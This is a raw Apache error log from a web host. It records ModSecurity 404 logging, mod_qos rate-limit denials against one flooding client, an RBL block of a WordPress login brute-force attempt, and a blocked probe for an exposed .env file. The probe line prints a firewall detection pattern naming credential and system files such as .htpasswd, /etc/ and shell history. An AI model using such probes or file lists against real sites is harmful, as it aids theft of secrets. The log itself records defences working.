[Tue May 26 19:54:17.374080 2026] [security2:error] [pid 86490:tid 86738] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEFZMwN0DpLVWo6K49gAAAPs"]
[Tue May 26 19:54:17.404455 2026] [security2:error] [pid 93868:tid 94331] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEEqK9k_ZUB2Vp25HhgAAAdg"]
[Tue May 26 19:54:17.406050 2026] [security2:error] [pid 86490:tid 86739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEFZMwN0DpLVWo6K4_wAAAPw"]
[Tue May 26 19:54:17.412420 2026] [security2:error] [pid 86490:tid 86632] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEFZMwN0DpLVWo6K5JgAAAJE"]
[Tue May 26 19:54:17.416060 2026] [security2:error] [pid 93576:tid 93734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEGDRMqfxdEDkoszO4wAAABY"]
[Tue May 26 19:54:17.434502 2026] [security2:error] [pid 93868:tid 94345] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEEqK9k_ZUB2Vp25HgwAAAeY"]
[Tue May 26 19:54:17.434896 2026] [security2:error] [pid 93576:tid 93823] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEGDRMqfxdEDkoszO7gAAAG8"]
[Tue May 26 19:54:17.442002 2026] [security2:error] [pid 93868:tid 94359] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEEqK9k_ZUB2Vp25HfwAAAfQ"]
[Tue May 26 19:54:17.442061 2026] [security2:error] [pid 93868:tid 94309] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEEqK9k_ZUB2Vp25HhQAAAcI"]
[Tue May 26 19:54:17.444497 2026] [security2:error] [pid 93868:tid 94313] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEEqK9k_ZUB2Vp25HhAAAAcY"]
[Tue May 26 19:54:17.447567 2026] [security2:error] [pid 86490:tid 86665] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEFZMwN0DpLVWo6K48gAAALI"]
[Tue May 26 19:54:17.454420 2026] [security2:error] [pid 86490:tid 86664] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEFZMwN0DpLVWo6K5KAAAALE"]
[Tue May 26 19:54:17.460980 2026] [security2:error] [pid 93868:tid 94295] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEEqK9k_ZUB2Vp25HggAAAbQ"]
[Tue May 26 19:54:17.472051 2026] [security2:error] [pid 93868:tid 94327] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEEqK9k_ZUB2Vp25HiAAAAdQ"]
[Tue May 26 19:54:17.580860 2026] [qos:error] [pid 93868:tid 94297] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtEUqK9k_ZUB2Vp25HoQAAAbY
[Tue May 26 19:54:17.580979 2026] [qos:error] [pid 93868:tid 94358] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtEUqK9k_ZUB2Vp25HoAAAAfM
[Tue May 26 19:54:17.594057 2026] [qos:error] [pid 93868:tid 94315] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtEUqK9k_ZUB2Vp25HpAAAAcg
[Tue May 26 19:54:17.595117 2026] [qos:error] [pid 86490:tid 86629] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K54gAAAI4
[Tue May 26 19:54:17.595945 2026] [qos:error] [pid 93576:tid 93755] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtEWDRMqfxdEDkoszPFAAAACs
[Tue May 26 19:54:17.596803 2026] [qos:error] [pid 86490:tid 86662] [client 45.148.10.120:34958] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K54wAAAK8
[Tue May 26 19:54:17.602345 2026] [qos:error] [pid 86490:tid 86683] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K55AAAAMQ
[Tue May 26 19:54:17.602844 2026] [qos:error] [pid 86490:tid 86658] [client 45.148.10.120:35072] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K55QAAAKs
[Tue May 26 19:54:17.612466 2026] [qos:error] [pid 86490:tid 86691] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K55gAAAMw
[Tue May 26 19:54:17.622403 2026] [qos:error] [pid 86490:tid 86701] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K55wAAANY
[Tue May 26 19:54:17.711359 2026] [security2:error] [pid 86490:tid 86580] [remote 123.30.233.13:35630] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtEVZMwN0DpLVWo6K56QAAsFk"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:54:17.764003 2026] [qos:error] [pid 86490:tid 86703] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K56wAAANg
[Tue May 26 19:54:17.764116 2026] [qos:error] [pid 86490:tid 86722] [client 45.148.10.120:34946] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K57AAAAOs
[Tue May 26 19:54:17.765773 2026] [qos:error] [pid 86490:tid 86698] [client 45.148.10.120:34806] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K57gAAANM
[Tue May 26 19:54:17.765994 2026] [qos:error] [pid 86490:tid 86747] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K57QAAAQQ
[Tue May 26 19:54:17.767212 2026] [qos:error] [pid 86490:tid 86662] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K58AAAAK8
[Tue May 26 19:54:17.767945 2026] [qos:error] [pid 86490:tid 86662] [client 45.148.10.120:34958] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K58QAAAK8
[Tue May 26 19:54:17.768121 2026] [qos:error] [pid 86490:tid 86629] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K57wAAAI4
[Tue May 26 19:54:17.774370 2026] [qos:error] [pid 86490:tid 86691] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K58wAAAMw
[Tue May 26 19:54:17.776583 2026] [qos:error] [pid 86490:tid 86701] [client 45.148.10.120:35072] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K59QAAANY
[Tue May 26 19:54:17.779181 2026] [qos:error] [pid 86490:tid 86651] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K59gAAAKQ
[Tue May 26 19:54:17.916380 2026] [qos:error] [pid 86490:tid 86730] [client 45.148.10.120:34806] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K5-gAAAPM
[Tue May 26 19:54:17.916566 2026] [qos:error] [pid 86490:tid 86696] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K5-wAAANE
[Tue May 26 19:54:17.917523 2026] [qos:error] [pid 86490:tid 86663] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K5-QAAALA
[Tue May 26 19:54:17.920674 2026] [qos:error] [pid 86490:tid 86703] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K5_AAAANg
[Tue May 26 19:54:17.921380 2026] [qos:error] [pid 86490:tid 86722] [client 45.148.10.120:34946] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K5_QAAAOs
[Tue May 26 19:54:17.922888 2026] [qos:error] [pid 86490:tid 86698] [client 45.148.10.120:34958] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K5_gAAANM
[Tue May 26 19:54:17.924553 2026] [qos:error] [pid 86490:tid 86683] [client 45.148.10.120:35072] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K5_wAAAMQ
[Tue May 26 19:54:17.924671 2026] [qos:error] [pid 86490:tid 86747] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K6AAAAAQQ
[Tue May 26 19:54:17.930745 2026] [qos:error] [pid 86490:tid 86662] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K6AQAAAK8
[Tue May 26 19:54:17.932264 2026] [qos:error] [pid 86490:tid 86629] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K6AgAAAI4
[Tue May 26 19:54:18.066334 2026] [qos:error] [pid 86490:tid 86730] [client 45.148.10.120:34806] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6BAAAAPM
[Tue May 26 19:54:18.068110 2026] [qos:error] [pid 86490:tid 86696] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6BQAAANE
[Tue May 26 19:54:18.068920 2026] [qos:error] [pid 86490:tid 86663] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6BgAAALA
[Tue May 26 19:54:18.072453 2026] [qos:error] [pid 86490:tid 86703] [client 45.148.10.120:34958] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6BwAAANg
[Tue May 26 19:54:18.073888 2026] [qos:error] [pid 86490:tid 86722] [client 45.148.10.120:35072] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6CAAAAOs
[Tue May 26 19:54:18.073914 2026] [qos:error] [pid 86490:tid 86698] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6CQAAANM
[Tue May 26 19:54:18.077381 2026] [qos:error] [pid 86490:tid 86683] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6CgAAAMQ
[Tue May 26 19:54:18.080695 2026] [qos:error] [pid 86490:tid 86747] [client 45.148.10.120:34946] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6CwAAAQQ
[Tue May 26 19:54:18.087174 2026] [qos:error] [pid 86490:tid 86662] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6DAAAAK8
[Tue May 26 19:54:18.087939 2026] [qos:error] [pid 86490:tid 86662] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6DQAAAK8
[Tue May 26 19:54:18.220438 2026] [qos:error] [pid 86490:tid 86722] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6FAAAAOs
[Tue May 26 19:54:18.220441 2026] [qos:error] [pid 86490:tid 86703] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6EwAAANg
[Tue May 26 19:54:18.221218 2026] [qos:error] [pid 86490:tid 86722] [client 45.148.10.120:34806] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6FQAAAOs
[Tue May 26 19:54:18.221962 2026] [qos:error] [pid 86490:tid 86683] [client 45.148.10.120:35072] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6FgAAAMQ
[Tue May 26 19:54:18.224016 2026] [qos:error] [pid 86490:tid 86747] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6FwAAAQQ
[Tue May 26 19:54:18.224597 2026] [qos:error] [pid 86490:tid 86662] [client 45.148.10.120:34958] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6GAAAAK8
[Tue May 26 19:54:18.230573 2026] [qos:error] [pid 86490:tid 86629] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6GQAAAI4
[Tue May 26 19:54:18.236058 2026] [qos:error] [pid 86490:tid 86691] [client 45.148.10.120:34946] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6GgAAAMw
[Tue May 26 19:54:18.244693 2026] [qos:error] [pid 86490:tid 86674] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6HAAAALs
[Tue May 26 19:54:18.245187 2026] [qos:error] [pid 86490:tid 86736] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6GwAAAPk
[Tue May 26 19:54:18.248275 2026] [security2:error] [pid 86490:tid 86684] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtEVZMwN0DpLVWo6K59AAAAMU"]
[Tue May 26 19:54:18.278744 2026] [security2:error] [pid 93868:tid 94376] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEEqK9k_ZUB2Vp25HiwAAAgU"]
[Tue May 26 19:54:18.280954 2026] [security2:error] [pid 93576:tid 93760] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEGDRMqfxdEDkoszO7AAAADA"]
[Tue May 26 19:54:18.284233 2026] [security2:error] [pid 86490:tid 86701] [client 185.177.72.53:35070] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/rc/.env"] [unique_id "ahWtElZMwN0DpLVWo6K6HQAAANY"]
[Tue May 26 19:54:18.287404 2026] [security2:error] [pid 93868:tid 94330] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEEqK9k_ZUB2Vp25HiQAAAdc"]
[Tue May 26 19:54:18.288263 2026] [security2:error] [pid 93868:tid 94347] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEEqK9k_ZUB2Vp25HjAAAAeg"]
[Tue May 26 19:54:18.289339 2026] [security2:error] [pid 86490:tid 86719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEFZMwN0DpLVWo6K5IwAAAOg"]
[Tue May 26 19:54:18.300295 2026] [security2:error] [pid 86490:tid 86669] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEFZMwN0DpLVWo6K5QQAAALY"]
[Tue May 26 19:54:18.302316 2026] [security2:error] [pid 93868:tid 94259] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEEqK9k_ZUB2Vp25HigAAAZA"]
[Tue May 26 19:54:18.303028 2026] [security2:error] [pid 93576:tid 93735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEGDRMqfxdEDkoszO4gAAABc"]
[Tue May 26 19:54:18.308842 2026] [security2:error] [pid 86490:tid 86646] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEFZMwN0DpLVWo6K5OwAAAJ8"]
[Tue May 26 19:54:18.318519 2026] [security2:error] [pid 93576:tid 93789] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEGDRMqfxdEDkoszO9AAAAE0"]
[Tue May 26 19:54:18.324769 2026] [security2:error] [pid 86490:tid 86630] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEFZMwN0DpLVWo6K5RgAAAI8"]
[Tue May 26 19:54:18.325904 2026] [security2:error] [pid 86490:tid 86636] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEFZMwN0DpLVWo6K5UgAAAJU"]
[Tue May 26 19:54:18.326146 2026] [security2:error] [pid 86490:tid 86620] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEFZMwN0DpLVWo6K5SQAAAIU"]
[Tue May 26 19:54:18.346327 2026] [security2:error] [pid 86490:tid 86653] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEFZMwN0DpLVWo6K5UwAAAKY"]
[Tue May 26 19:54:18.356579 2026] [security2:error] [pid 93576:tid 93788] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEGDRMqfxdEDkoszO-AAAAEw"]
[Tue May 26 19:54:18.358851 2026] [security2:error] [pid 93576:tid 93777] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEGDRMqfxdEDkoszO-QAAAEE"]
[Tue May 26 19:54:18.365764 2026] [security2:error] [pid 86490:tid 86689] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEFZMwN0DpLVWo6K5RwAAAMo"]
[Tue May 26 19:54:18.366195 2026] [security2:error] [pid 93868:tid 94328] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEEqK9k_ZUB2Vp25HjQAAAdU"]
[Tue May 26 19:54:18.375015 2026] [security2:error] [pid 86490:tid 86667] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEVZMwN0DpLVWo6K5oQAAALQ"]
[Tue May 26 19:54:18.380910 2026] [security2:error] [pid 93576:tid 93794] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEWDRMqfxdEDkoszPBgAAAFI"]
[Tue May 26 19:54:18.381578 2026] [security2:error] [pid 86490:tid 86639] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEFZMwN0DpLVWo6K5TAAAAJg"]
[Tue May 26 19:54:18.391280 2026] [security2:error] [pid 93576:tid 93793] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEWDRMqfxdEDkoszPCwAAAFE"]
